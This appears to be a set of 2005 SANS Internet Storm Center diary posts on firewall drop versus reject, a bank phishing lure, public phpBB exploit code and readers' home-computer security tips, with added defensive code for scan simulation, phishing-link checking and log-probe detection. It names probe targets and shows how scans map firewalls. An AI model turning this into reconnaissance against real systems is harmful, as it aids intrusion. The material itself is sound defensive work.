Swa Frantzen


Published: 2005-12-26

Silent Drop vs Reject Firewall rules

We received several comments about firewall rules and silently dropping packets vs. sending the correct ICMP or TCP reset codes. While it violates some RFCs, silent drop is my standard recommendation.
Some might ask why I choose silent drop. I will explain, but first a few questions.

What does it help if the firewall sends notification of traffic it rejects?

Why tell the bad guy what you're blocking? (And what you're not blocking.)

Which good guy is permitted to scan my systems for open ports or protocols?

1: Silent drop prevents some reflective attacks.
In some cases the source address of the attack victim is spoofed. The desire is to cause firewalls, routers and other systems to send traffic back against the spoofed source.

2: Silent drop prevents reverse mapping.
In other cases, by sending back a "port closed" type message your firewall can be negatively mapped (e.g. denied 1-1024 except 22, 23, 25, ...). That is how the nmap UDP port scan and protocol scan work: they basically assume a port or protocol is open unless they get a message stating it's closed.

3: Silent drop might not be effective, as a reject might never reach the intended target.
With the recently discovered blind TCP resets via forged ICMP errors, the RFCs governing some of these reactions will probably be changed. Gont, who reported the vulnerability, suggested that a larger part of the original packet be returned with the ICMP error packet. In the meantime one of the primary mitigations for this issue is to ignore the first few ICMP errors that could cause a reset. Many networks blocked some incoming ICMP error messages as a result of that vulnerability.

I personally require silent drop (no icmp, no TCP resets) as a standard feature from firewalls and other filtering devices.

The jury is still out on the "correct" thing to do, but if a firewall or filtering device doesn't support silent drop I would not buy it or recommend it. It should be an option the end user can choose.

Additional comments were contributed by fellow handler Swa Frantzen and Johannes Ulrich respectively
"I try to build "drop" to the "bad" side and reject to the "good" side. Good and bad might not always be in and outside. I permit the network admin stations to initiate traceroute and icmp echoes, in order to not have the reaction "it's the firewall" all over the place when the firewall is working as intended."

One reason to have internal reject rules that prevent systems from 'calling out' but send a correct error report is that rejects make it easier to debug issues. In these cases it's more about mistakes than malicious users.
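The reverse-mapping argument (point 2 above) and the "drop to the bad side, reject to the good side" split in the handlers' comments can both be shown in a few lines. The following is an added example, not code from the diary: it simulates the inference an nmap-style UDP scan makes from a firewall's replies, showing why REJECT hands the scanner the allow list while silent DROP does not, and then emits a small default-deny iptables rule set that drops toward the untrusted interface and rejects toward the trusted one. No packets are sent; both firewall and scanner are modelled in code, and the interface names and allow list are constructed for the example.

```python
"""Silent drop vs. reject, seen from the scanner's side (added example)."""

ALLOWED_UDP = {53, 123}   # constructed allow list (DNS, NTP)


def firewall_reply(policy, port):
    """What one empty UDP probe to `port` gets back from the perimeter.

    Most UDP services ignore a probe that is not a valid request, so an
    allowed port is silent under both policies. Only denied ports differ:
    'reject' answers with ICMP port unreachable, 'drop' stays silent.
    """
    if port in ALLOWED_UDP:
        return None
    return "icmp-port-unreachable" if policy == "reject" else None


def scanner_state(reply):
    """Scanner-side rule from the diary: assume open unless told closed."""
    return "closed" if reply == "icmp-port-unreachable" else "open|filtered"


def map_firewall(policy, ports):
    """Port -> state as the scanner would report it under `policy`."""
    return {p: scanner_state(firewall_reply(policy, p)) for p in ports}


def candidate_ports(policy, ports):
    """Ports the scanner could not rule out. With REJECT this is exactly the
    allow list; with DROP it is every port probed, i.e. nothing was learned."""
    return sorted(p for p, s in map_firewall(policy, ports).items() if s != "closed")


def iptables_rules(trusted_if="eth1", untrusted_if="eth0"):
    """Default-deny skeleton: DROP on the Internet side, REJECT on the LAN
    side so admins get an immediate error instead of a timeout.
    Interface names are assumptions for the example."""
    rules = [
        "iptables -P INPUT DROP",
        "iptables -P FORWARD DROP",
        "iptables -P OUTPUT ACCEPT",
        "iptables -A INPUT -i lo -j ACCEPT",
        "iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT",
    ]
    for p in sorted(ALLOWED_UDP):
        rules.append(f"iptables -A INPUT -i {untrusted_if} -p udp --dport {p} -j ACCEPT")
    rules += [
        f"iptables -A INPUT -i {trusted_if} -p tcp --dport 22 -j ACCEPT",
        f"iptables -A INPUT -i {trusted_if} -p icmp --icmp-type echo-request -j ACCEPT",
        f"iptables -A INPUT -i {untrusted_if} -j DROP",
        f"iptables -A INPUT -i {trusted_if} -j REJECT --reject-with icmp-port-unreachable",
    ]
    return rules


if __name__ == "__main__":
    ports = range(1, 1025)
    print("reject policy lets the scanner narrow down to:", candidate_ports("reject", ports))
    print("drop policy leaves the scanner with", len(candidate_ports("drop", ports)), "candidates")
    print("\n".join(iptables_rules()))
```

Running it prints `[53, 123]` for the reject case and 1024 candidates for the drop case, which is the "negative map" of point 2 in numbers. The rule list is a starting point only; the ordering matters (the state rule before the per-port accepts, the interface-specific DROP/REJECT last), and the trusted-side REJECT is what keeps traceroute and failed connections from the admin stations from looking like a broken firewall.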



Published: 2005-12-26

Phishing: Saudi style

On a very slow day the majority of the messages that reached us were about phishing. It consisted of the usual phishing for ebay, amazon, ... accounts, but one stood out as somewhat unusual:

Suliman brought to our attention a phishing attempt written in Arabic, aimed at a bank out there and diverting the clicks to http://www_sambaonlineaccess_com/ instead of the bank's normal address, http://www.samba.com/. According to the submitter (I can't read Arabic) it was linked to an online registration for a large IPO of a chemical company.

Aside from the IPO connection, it was also noteworthy because of the language used (Arabic) and the location of the server the clicks were directed to: Israel. I cannot help noting that at the very least this is quite provocative.

The website supposedly collecting the information wasn't responding at the time I tried to look at it, which might be a good sign after all.

The lesson for the end users remains the same: never follow links you get in email. If possible turn off the rendering of HTML for email, it's a serious risk from a security perspective.

The warning for those of us fighting abuse is also clear.
  • Some attacks might aim at very short-lived events.
  • You won't be able to understand it all, so you will have to make sure you have processes in place that can deal with language in abuse complaints you can't understand yourself.
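Part of the second point can be automated: you do not need to read the language to notice that a message talking about one bank links to a host that is not that bank's. The following is an added example, not code from the diary: it pulls every link out of an HTML e-mail and flags those whose target is off the expected registered domain, or whose visible text shows one host while the href points at another. The sample message is constructed, and the lookalike host uses the reserved `.example` TLD as a stand-in for the redirect domain the post describes.

```python
"""Flag off-brand links in an HTML e-mail (added example, not ISC code)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def registrable_domain(host):
    """Approximate the registered domain by the last two labels.
    Assumption: no public-suffix list, fine for .com style names but wrong
    for e.g. co.uk; a production tool should consult a suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def suspicious_links(html, expected_domain):
    """Return [(href, [reasons])] for links that leave the brand's registered
    domain or whose text shows one host while pointing at another."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        parsed = urlparse(href)
        if parsed.scheme not in ("http", "https"):
            continue                      # mailto:, tel: etc. are out of scope here
        host = parsed.hostname or ""
        reasons = []
        if registrable_domain(host) != expected_domain.lower():
            reasons.append(f"target host {host!r} is not under {expected_domain}")
        # Visible text that looks like a host but does not match the target.
        shown = re.sub(r"^https?://", "", text.lower()).split("/")[0]
        if "." in shown and registrable_domain(shown) != registrable_domain(host):
            reasons.append(f"link text shows {shown!r} but target is {host!r}")
        if reasons:
            findings.append((href, reasons))
    return findings


# Constructed sample: one genuine link and one lookalike that displays the
# bank's hostname as its text.
SAMPLE_MAIL = """<html><body>
<p>Dear customer, register for the IPO through your online banking:</p>
<p><a href="http://www.samba.com/">our online banking site</a></p>
<p><a href="http://www.onlineaccess-lookalike.example/ipo">www.samba.com</a></p>
</body></html>"""

if __name__ == "__main__":
    for href, reasons in suspicious_links(SAMPLE_MAIL, "samba.com"):
        print(href)
        for r in reasons:
            print("   -", r)
```

The check is language-independent by design: it never looks at the message body, only at where the links go, which is exactly the part of an abuse complaint a responder can verify without a translator.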

Swa Frantzen


Published: 2005-12-25

Observations on the Family System Administrator

Some observations from http://isc.sans.org/diary.php?storyid=960:

  • 8% suggested the use of a hardware router
  • 8% suggested that Linux was the answer for their parents
  • 11% thought that Macs were a safer option
  • 19% were willing to enter a lifetime support contract for their parents
  • 19% thought that their parents couldn't handle a computer
  • 25% of the submitters chose to send their suggestions anonymously


Published: 2005-12-25

RFC2142 is a two-way street

As Johannes pointed out in http://isc.sans.org/diary.php?storyid=957 RFC2142 is a pretty good RFC to follow.  It works both ways too.

For example, let's say you're running vulnerability scans against your local bank's website and you come across what you think is a very serious vulnerability. Do you:

a) Jot that IP address down for later use when you need to pay off your credit card debts from the holiday season's over-indulgences.

b) Drop a friendly fact-filled note to abuse@localbank.com


c) Launch a media campaign to publicize the risk encouraging your readers to write letters to the Office of the Comptroller of the Currency

If one supports the idea of Responsible Disclosure the answer would be B, followed by C after an acceptable period of time.


Published: 2005-12-25

A couple of handy iptables tutorials

Harry Hoffman submitted his intro to iptables on Linux servers: http://www.ip-solutions.net/firewall/servers.html

It's a nice little getting-started piece, and it starts off with a default-deny policy, which is one of my personal favorites.

A more advanced treatment on reactive iptables is available here: http://www.sans.org/rr/special/index.php?id=adaptive_firewalls


Published: 2005-12-25

phpBB <= 2.0.17 exploit code in the wild

It's an early holiday gift for phpBB admins all over the world.  Exploit code affecting phpBB version 2.0.17 and previous has been made public.  The targeted vulnerability was announced on Halloween, and updates have been available since then.

I predict we'll be seeing profile.php probes appear in your web logs right along with the awstats and xml-rpc attacks that you've been getting.
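If you want to see those probes rather than guess, the following added example (not code from the diary) scans Apache combined-format access log lines for requests to the three paths named above (phpBB's profile.php, awstats and xml-rpc) and summarises them per client address. The log lines are constructed, with client addresses from the 192.0.2.0/24 documentation range.

```python
"""Spot probes for profile.php, awstats and xmlrpc in an access log (added example)."""
import re
from collections import Counter, defaultdict

# ip ident user [timestamp] "METHOD path HTTP/x.y" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Only the path is matched; query strings are deliberately ignored so
# probes that vary the parameters still count.
PROBE_PATTERNS = {
    "phpbb-profile": re.compile(r"(^|/)profile\.php(\?|$)", re.I),
    "awstats": re.compile(r"/awstats(\.pl)?(/|\?|$)", re.I),
    "xmlrpc": re.compile(r"/xmlrpc\.php(\?|$)", re.I),
}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_path(path):
    """Names of the probe families a request path matches (usually zero or one)."""
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(path)]


def find_probes(lines):
    """Map client ip -> Counter of probe families seen from it."""
    hits = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name in classify_path(rec["path"]):
            hits[rec["ip"]][name] += 1
    return hits


def report(hits):
    """(ip, total probes, per-family counts) sorted by most active client."""
    return sorted(((ip, sum(c.values()), dict(c)) for ip, c in hits.items()),
                  key=lambda row: -row[1])


# Constructed sample log; one unparsable line is included on purpose.
SAMPLE_LOG = [
    '192.0.2.5 - - [26/Dec/2005:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [26/Dec/2005:10:00:07 +0000] "GET /forum/profile.php?mode=register HTTP/1.0" 200 2210 "-" "-"',
    '192.0.2.10 - - [26/Dec/2005:10:00:09 +0000] "GET /cgi-bin/awstats.pl HTTP/1.0" 404 300 "-" "-"',
    '192.0.2.22 - - [26/Dec/2005:10:01:30 +0000] "POST /xmlrpc.php HTTP/1.1" 404 300 "-" "-"',
    '192.0.2.5 - - [26/Dec/2005:10:01:44 +0000] "GET /images/logo.png HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, total, families in report(find_probes(SAMPLE_LOG)):
        print(f"{ip:15} {total:3} {families}")
```

A single hit on a path that exists on your site is normal traffic; what you are looking for is the same client walking through several of these families in a short window, or requests for profile.php on a host that does not run phpBB at all.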


Published: 2005-12-24

The Family System Administrator

A couple of days ago we asked our readers, "if your parents got a new computer for Christmas, what would you tell them to do?"  The responses have been great!  Rather than trying to summarize, we decided to just print them all in the order they were received.  If the submitter clicked the box that said it was OK to use their name, we've done so.  Thanks to everybody who sent us their ideas.

Good luck on Christmas morning, everybody!  We know that most of our readers are also family system administrators and this time of year we work overtime.

Best wishes to you and your family from all of us at the Internet Storm Center!

Marcus H. Sachs
Director, SANS Internet Storm Center

From Gary Hinson:

I'd talk them through Bill Cheswick's presentation: "My Dad's Computer, Microsoft, and the Future of Internet Security" at


Merry Christmas to all at SANS.

From Yves Konigshofer:

If it's a new computer, I would tell them to get a wired (not wireless) router at the same time and set up the router with the old computer before connecting the new computer.  That way, windows updates can be installed without having to worry about worms.

In fact, I got my parents a router last year (OK, I also wanted to be able to use my laptop there at the same time) and my father is looking to get a new computer any day now.

It's also important to set up accounts that are not administrator accounts for everyday use.

From John Herron:

If my parents received a new computer for Christmas I would tell them to use Firefox with the Adblock and NoScript extensions.  And if they were ever asked to answer "Yes" or "No" they were to answer "NO" unless they called me first.  The internet is just too dangerous for amateurs unless they follow these steps.

From Pawel Maczka:

We can multiply hundreds of tips, but the following is an essential, minimum "must have" list to protect a new Windows box with absolutely minimum cost and effort:
- set strong admin password - use >= 8 characters mix with !"#¤&/) and numbers
- just uncheck "Sharing disks and printers in MS networks" in network connection properties
- agree for firewall and automatic updates
- get Mozilla FF from www.mozilla.com and set as default system browser.
- purchase and install commercial antivirus software
- set password for regular user like admin password
- install an ad/spy-ware freeware like spybot or lava or even just MS AntiSpyware

From Jafar Calley:

First I would tell them to give me a few hours with it to remove Windows and install Linux. Then they can claim a "Cashback" from Microsoft by sending back a rejected licence. :D

Next, my present to them would be free Linux lessons and support for life. As they are complete PC n00bs they wouldn't be able to tell the difference between Linux and Windows, but a little help in using it would go a long way.

Using Linux would also be less frustrating for them as they wouldn't have to worry so much about viruses and spam so they can surf the "interweb net thingy" without worrying. No Spyware either.

Most other stuff like email, writing letters etc. is straightforward and usually pre-installed with most Linux distros, so after a few lessons they won't need to keep calling me back because the computer keeps crashing or they can't do what they want to do.

From Steve K:

If my folks got a Windows PC for Christmas I would explain that it's a very powerful tool - not an appliance, and that they "would only benefit from it if they were to attend a local training course (picked by my good self)", one which covered Windows & broadband security routines.

(Luckily the limit to my father's computing expertise is playing "Missile Command" from MS Arcade and he has no aspirations to further technical savoir faire!)

From Peter Glock:

I'm getting a mac mini for my mum to rig up to her LCD TV.  This will replace an ageing IBM ThinkPad which I'm heartily sick of providing remote support on (she lives 150 miles away). 

She has an existing AOL account for the rare times when she needs to be online which I set up for her some years ago. I foolishly thought this would add some additional layer of protection (d'oh).

I'll use the included Apple Remote Desktop to give me VNC access (tunneled over ssh of course) for remote diagnostics; not sure how this will work through the AOL proxy, I will probably have to put a script together to set up a reverse tunnel.  I'll set her up two accounts, a 'normal' one for everyday usage plus an admin account for those rare occasions when she needs to install/update something.

The Mac firewall will be set to allow only ssh inbound.  I'll set up ClamAV on the Mac to scan stuff for malware.

I'm probably going to set up a wifi dial-up access point (I have an older Apple Airport going spare) so she doesn't have to have a phone lead installed by the TV.  This will be locked down with WPA.

Think that's it!

From Gavin:

If my parents got a new computer for Christmas, I'd make sure they had my brother-in-law's number and go on holiday somewhere with no mobile phone coverage.

From Anonymous:

If my parents were to get a new computer, I'd take on the role of security elf and intercept it to ensure it would still be running on the Day After Christmas.

Knowing it would most likely be Windows as the OS (beginner's choice), I'd have autoupdate set up, AV with hourly checks and weekly scans, a REAL firewall with updates set up, and a card taped to the monitor with my phone number for emergencies that will occur (new users).

After a bit, I might try to persuade them to go LINUX, use openoffice, firefox, thunderbird, etc.  Security updates are posted as soon as they can be resolved and don't wait for a patch cycle on fixes for Zero-Day exploits.

From Anonymous:

If my parents received a new computer for Christmas I would insist that they give it back.  I have spent years trying to educate them on the basic concepts of how to use a computer and they still struggle with the concept of 'right-clicking' for a list of options; they still do not understand how to send photos via email to Aunt whoever or how to save the photo of Uncle Joe that was emailed to them.

I find that many of my relatives that are 55 and older just have not had the experience with technology to intuitively understand it and these are the same ones with always-on high speed connections at home and no firewall/AV measures.  I spend many hours helping fix these issues for them only to find that after 12 months and the subscription runs out, they get confused by the nag screen asking for a renewal and never do it and end up compromised again.  Return to top of paragraph.

I hate this time of year....  My list of relatives that call me for help will increase with each new PDA, computer, and MP3 player.

From Randy Nash:

I saw your post this morning asking what we'd tell our parents if they got a new computer for Christmas.  Last year I started getting calls right after Christmas from family and friends, prompting me to write my "New Years Security Resolutions" article (http://www.atriskonline.com/archives/00000037.htm)

While some of this may be somewhat dated, I tried to keep it generic and high-level enough to be useful over time.  Today I'd at least add a section on using a secondary browser such as FireFox.  I may also expand on the various tool listings for each category.  I hope you find this suitable.

From John Franolich:

This is easy on the windows home user...

UltraVNC is a nice remote app that can be customized to connect with your IP.  The executable, that the home user downloads, does not install as a service.  Also, it will time out after a few minutes if there is not any inbound connection. 

See http://ajaxtricks.blogspot.com/2005/11/put-geeksquad-out-of-business.html

and http://www.uvnc.com/addons/singleclick.html

From Bert Rapp:

I'd tell them to buy a Mac.  I've been telling everyone to buy Macs.

From Michael Varre:

Return it for a full refund. Then take the money and go on vacation for a few days :)

From Dan:

What I would tell my parents is:

Write down the Dell tech support number and keep it on the fridge.

P.S. That number should do ya for a year  :)  After that please feel free to call me.   Baahhhhh Humbug.

Oh, I may also share the basics of keeping their computer up to date with patches. A reminder every week or so in their calendar to double check their AV signatures and run a spyware scan also worked extremely well.

From Art McFadden:

If my mother-in-law were to get a new computer for Christmas, first, I would faint.  Then I would get ready to be bombarded with calls.

The first logical steps would be to ensure the OS and drivers are up to date and add some of my favorites: Microsoft's anti-spyware program, Spybot Search and Destroy, and Grisoft's free version of AVG antivirus.  From experience, I have found that people with expired antivirus programs allow them to lapse for two main reasons:

•  Money-  Will the computer still work?  Yes?  Well then why should I pay anything?  I won't get a virus.  (sounds like an incorrect similar line of thought I heard about from some less cautious fellow students in college ;-)
•  Not informed-  We warn people constantly about fraud on the Internet, identity theft, and other white collar crimes.  Now they get a window asking them for credit card information.  Hopefully, they will call someone they trust before dismissing this as a scam to be enlightened.

If my father (the retired computer analyst/administrator) received a new computer for Christmas, I would ask him what the specs were and how does he like it.  After all, he is one of the people I call when I have questions.

Happy Holidays and stay safe.

From Tim:

Already happened...  In '98 us "kids" got together to get a pc for mom and dad.  Windows 98 with dialup AOL.  Put the usual Office suite, McAfee, Adobe, etc on the box.  Then came training day - ugh.  We very slowly went thru the power on, boot up, click the America Off Line button, listen to the modem dial, connect, verify the username, click No Thanks to their barrage of ads, then click the email icon.  I had already called my brother on the other coast to email jpgs of his kids.  We found the email waiting and explained how to view the attached photos.  As soon as he was done reading the email, dad reached over and unplugged the pc from the wall - while still online.  In disbelief, I asked why he did that.  His reply:  "I was finished".  It took another week of constant tutoring before he could grasp the concept of disconnecting from AOL and shutting down the machine before powering down.  He was 70 then.
Now he has broadband on a little celery 2 gig machine.  He still does email, but now his joy is printing color photos of the fish his son catches.  He goes thru color ink cartridges pretty fast.  I worry about phishing attacks because he's a prime target.  I swing by and run spybot and adaware occasionally and so far, so good.
My neighbors are in their 80's and surf high speed all the time.  They are very pc savvy and know about suspicious emails and using Firefox instead of IE, etc.  It just depends on their comfort levels.  Mom and Dad's machine is ripe for a zombie attack, while my neighbors are trusted surfers.
happy holidaze

From Wayne Smith:

What I told my mom over two years ago when she 'got a Dell'.

1) You will use alphanumeric passwords at least 8 chars long.  You will not use the same password for more than one account.  Your ISP email password should not be the same password you use for ebay, which should not be the same password you use for paypal.  Period.
2) You will have an anti-virus program installed and you will update it every time you are online.  You will get the new upgrade once a year.  Yeah, it's a pain on dial-up so just do it when you are done surfing each time, unless you haven't been on for a few weeks and then do it immediately before you surf the web or check email.
3) email... you will never forward, forward, forward something that simply has to go to all your friends.  Chili's and Sears aren't giving away their money.  If you forward anything like that to me, I'm changing my email address and my name.
4) you will never, ever, for any reason, click on a link inside an email.  If you want to go to ebay, paypal, anywhere, you open up a new browser and type the URL in.  You look for the 'lock' and the https.  If it looks strange, don't trust it.  If anybody says your account has been hacked and click here, what do you do? Exactly
5) if you weren't expecting an attachment in an email, you don't open the attachment until you contact the person you know and ask them what it is and why and have them confirm they sent it.  If you don't know the person sending it, delete it and don't email the person.
6) Windows requires updating.   It's not an option.  When you are online, check for new updates.
7) you will have a separate, low limit credit card you use for online transactions.  You never send the number via email and unless you see https, the lock, and you didn't get any warnings about 'certificate', etc, you don't use it.
8) if something pops up on your screen, you'll read the whole message before clicking anything.

I'm a tech head and so is my wife.  My Mom is on the other side of the spectrum.  She's been computing safely for two years and only asks me for help when she needs to pull down a new copy of Norton once a year (hard on dialup).

From Dean:

If Mom and Dad actually bought a new computer, we would have miracle number one...
If I could talk them through installing the antivirus and firewall software, we would have our second miracle.
Now if, and this is a biggie...if I could get Mom and Dad to stop forwarding every single chain letter they receive, asking if it really is true, or warning me about...
This would be miracle number three, and I would consider myself truly blessed.

Happy Holidays to all!

From R. J. Brown:

My father is 84 years old, and has several computers already.  I tried to get him to switch to Linux, but the learning curve was too steep for him without my being able to be there physically and help him.  The only advice I would give him at this point is to be sure his anti-malware tools are working -- virus scanner, internal firewall, and spyware scanner.  He pretty well knows what he is doing by now.  He was involved with the early GE computers in the 1950's, and is a big reason why I am now a computer consultant myself!  Now my wife's mother?  If she got a new computer for Christmas, I would just tell her not to hook it to the internet!  ;-)

From Jim Halfpenny:

...I'd buy them a copy of Civilisation IV and tell them the Internet is expensive and overrated.

My parents do have a computer and use it only for web browsing. It's coming home with me this Christmas to have Linux installed on it. So long as it has Firefox and Solitaire they will be happy. So long as it's not got pr0n dialers, spam relays, spyware, adware, DoS tools, viruses, trojans, worms et al. I'll be happy.

From David Hamilton:

I gave my parents a computer at Christmas a few years ago.  My folks have DSL. I installed a hardware firewall and virus protection immediately.  Later on, Firefox, anti-spyware and a pop up blocker all with training. I keep the "gift giving" going all year by talking to them about the bad stuff out there in terms that make sense to them.  I also trained them to ask me if they have questions or just don't understand. 

If I did it over, I would install hardware and software above all at once and train them throughout the year. 

From Kristina Harris:

I dunno about everyone else, but if my parents got a new computer for Christmas (without me getting it, in which case they would get it with all applicable updates, antivirus, and firewall software installed), it would go something like this:

*ring* *ring*


"Hi, honey, it's mom."

"Oh, hi mom."

"Say, I got a new computer, and I was wondering if ..."


" ... what's that?"

"No. Just No. You got it at Costco, didn't you?"

"Well, yes, but ..."

"And it has Windows, doesn't it?"

"I think so, but ..."

"Okay, do NOT plug in the computer until I come over with my  adware detector/firewall/antivirus CD."

"Well, I was just going to .."


" ... what?"

"I said no. No, no, no. Do NOT. Plug IN. The computer. Until I get there."

"Well, really, honey I was just ..."

"Mom, don't make me disable your DSL."

"Oh ... okay."

"I'll be over in a few minutes."

"All right honey, I guess I could wait for ..."

"Oh, and Mom?"


"If you decide not to listen to me, just remember: Wells Fargo does not outsource their emailing to a company in Uganda, and Paypal does NOT need to verify your information. Neither does eBay. And you don't need to click on that link to verify anything. Trust me."

"Oh. Are you sure?"

"Yes. Oh, and Mom?"

"Yes, honey?"

"Merry Christmas."


From Ron M:

"The question to you is, if your parents got a new computer for Christmas, what would you tell them to do?"

Return it. No kidding. There's just no hope that it'll stay updated and happy if they actually plug it in. A cuticle chainsaw would be a safer gift.

Have a good holiday, all!

From Anonymous:

I would tell them to _not_ connect it to the Internet, until I did a few things:
* many new motherboards have built-in RAID capabilities.
I would purchase a 2nd hard-drive, and build a "mirrored"
RAID configuration.  Then, if one hard-drive died, the other drive will become a backup, until I could replace the dead-drive, and re-enable the mirroring.
Yes, mirroring adds a one-time hardware cost, but it certainly is much easier for my parents than trying to teach them how to do routine backups.
* enable the Windows XP firewall *BEFORE* connecting the computer to the Internet, and then accessing Windows Update.
* download free software: MS Word Viewer, Adobe Reader, the GIMP (www.gimp.org), the latest Shockwave and Flash plug-ins.  Then, tell them that anytime that a pop-up window tells them to download or install something, just say "no", by closing the window, rather than clicking on the "NO" or "DECLINE" or "CANCEL" buttons inside the window.
* of course, anti-virus software (www.my-etrust.com/microsoft) is an absolute essential.
* inventory the CDs and documents that come with the computer, to ensure that they have received everything that they are entitled to, and help them to store that bundle in a safe place.

Enough?  :-)

From Alan:

My advice to anyone receiving a new computer for Christmas:

1) Do not connect it to the Internet without an external hardware firewall.

2) Boot the machine and set a secure login password for admin / root and for the user account.

The following advice assumes it is a Windows machine

3) Before doing ANYTHING ELSE, perform a complete Windows Update. 

4) Launch Internet Explorer.  Download and install an alternative browser.  My choice is Firefox, but Opera is also a reasonable choice.  Then remove the blue e from the desktop and the launcher on the taskbar, and exit from IE.

5) Launch the alternative browser. Download and install Thunderbird for email.  Remove Outlook / Outlook Express from the desktop and the launcher taskbar.

6) Install a good anti-spam tool.  I like K9 from www.keir.net/k9.html.  Teach the new PC owner how to train the antispam tool.

7)  Download and install a personal firewall.  Unfortunately Sygate is no longer recommended because support has ended :-(  ZoneAlarm is ok.

8) Download and install the free grisoft AVG antivirus product.  Update it and set it up to scan nightly.

9) Go to housecall.trendmicro.com and perform a scan to be sure the machine is clean.

10) Give the standard lecture about not clicking on links in emails, not opening attachments, and being generally paranoid about unknown web sites.

11) If they insist on using instant messaging, install the latest version of gaim and remove icons for any IM tool supplied with the pc.

12) Install Startup Monitor and Startup Control Panel from http://www.mlin.net/.  Educate the owner about how to answer the popup questions that will occasionally be presented to them.

ALTERNATIVE to #3-12:  Install Ubuntu Linux or a similar user-friendly distribution.

From Anonymous:

If my parents got a new computer for Christmas and it was a laptop, I'd tell them to plug the thing in, turn it on, close it, put it on the floor, put their feet on it - and they'd have warm feet all day long ;-)

From Anonymous:

It's funny you should ask; my parents ARE getting a new computer for Christmas. I steered them to a notebook so they could easily transport it between their winter and summer places. That also means they can just bring it with them when they stop by my house and I can check it out.

From Anonymous:

Direct them to leave it in the box and bury it in the backyard. :)

From Mike Lewis:

My advice would be simple. Buy a MAC with the 3-year service and support contract, and then in 3-years, buy another MAC. The things my parents would do with a PC include e-mail, web browsing, paying bills on-line, and maybe saving digital pictures.

Why go through all the service, support, spyware, antivirus, free downloads ... crap available to Windows based PCs if all you want to do is e-mail, surf, and save pictures?!

From Brent Bice:

Interesting that you ask this as I've had this same scenario with several family members except not at Christmas. :-)

1.  The first thing I've recommended several times to the extended family is, go buy a router/firewall -- not just firewall software, but a separate network device. Yes, they've had their own set of issues but it's far harder and less likely that the malware du jour will disable a hardware firewall than any of the software firewalls that may be on a compromised PC. I also urge them to get the latest firmware updates for their new network router/firewall.

2. From behind the firewall, update the brand new machine with the latest recommended patches and all security patches from Microsoft.  Reboot. Rinse, lather, repeat until no more recommended or security patches are found.

3. Repeat step 2 with any software packages installed on the system and repeat as needed if any additional software gets installed.

4. Install Firefox and Mozilla and configure them to not trust cookies, have javascript off by default and to not load remote images.  Yes, Firefox and Mozilla have also had security bugs, but they've been fewer in number and usually less severe and less broad in scope than those found in MSIE and Lookout (er, I mean Outlook).  Tell the user to use firefox when possible, enable javascript only when absolutely necessary, and use MSIE only when absolutely necessary and only for trusted websites (like their employer's poorly designed website, for instance).

5. Uninstall unneeded software.

6. Install/update anti-virus software. Ensure it updates itself at least once a day.

7. Install/update anti-spyware tools such as (but not limited to) Spybot S&D, AdAware, the new MS Malware Removal Tool, etc.

8. Give a class (or two or three) on the care 'n feeding of anti-virus software, anti-spyware software, applying updates (ensure automatic-updates are on), recognizing phish, the risks of opening holes in the firewall or installing browser plugins/helpers, and generally install a bit of healthy skepticism about clicking on links coming via IM or email.

   Most of these require that I or another geeky family member pay a visit to help out. Oh well. It's usually good for a dinner and generally means far fewer of those REALLY painful attempts to walk someone through un-fscking their computer over the phone after it's been trashed by the MS Worm of the week -- especially if you're a unix geek like myself who hasn't kept up with all the changes to the windows desktop interface!

From Keith Rosenberg:

What would I tell my Parents?
- Antivirus software
- Firewall
- anti-spam capability
- Hardware firewall if they have broadband
- Keep OS and all software updated
- Provide phone and e-mail support
- Educate them about the internet's redlight district
- And finally, set up their computer for them if possible. That is what I did in one case.

From Anonymous:

Have them return it.

From Dave Rundle

'Twas the day after Christmas, when all through the house
we were gathered round the PC, examining the mouse;
The flat-panel LCD; speakers, so new and so crisp,
Displayed Microsoft Sam, with his usual lisp;

"Welcome to Windows," it intoned with a beep
Never warning that the Internet has more than one creep;
And mamma's logging in, and shopping like crazy,
Cause security issues make most people lazy,

When up on the screen there arose a quick popup,
A quick flash of the drive light, a really quick screw-up.
Away to the keyboard I flew like a flash,
Tore open the registry and cried "Where's the Patch!"

The new startup path was pointed to "Temp,"
Hmm, where the Internet cache is usually kept?
When, what to my wondering eyes should appear,
But a known key logger, to cause much fear

With an outdated driver, more useless than junk,
"Who hacked my computer; what little cyber-punk!"
More holes than had patches, who was to blame?
And he whistled, and shouted, and called them by name;

"Now, Microsoft! now, Borland! now, eBay and Spammers!
On, Oracle! on Apache! on, Mozilla and Hackers!
Who can guard my computer, who's the best of them all?
Who can do a good job, and not leave me to fall?

As Norton was loaded, and Mcafee started,
My guests grew tired, and soon they departed.
Loading up patches took most of the night,
And then the next morning, I had a new fight.

My adolescent son awoke before dawn
Frantic scrambles downstairs I heard as I woke with a yawn.
Cam Girls Live he'd found; a deviant site,
You won't meet him here, cause he's grounded for life.

Net Nanny I loaded, and then CyberSitter,
A whole lot of trouble caused by this little critter…
A new bunch of toolbars has just been installed,
And a DLL error, (the kid will get mauled!)

By the next week, I gave up, the computer reloaded,
40 hours of work, like the Matrix I coded.
Had I taken the time to prepare my Dell,
I would not be sitting here inside malware hell.

From Anonymous:

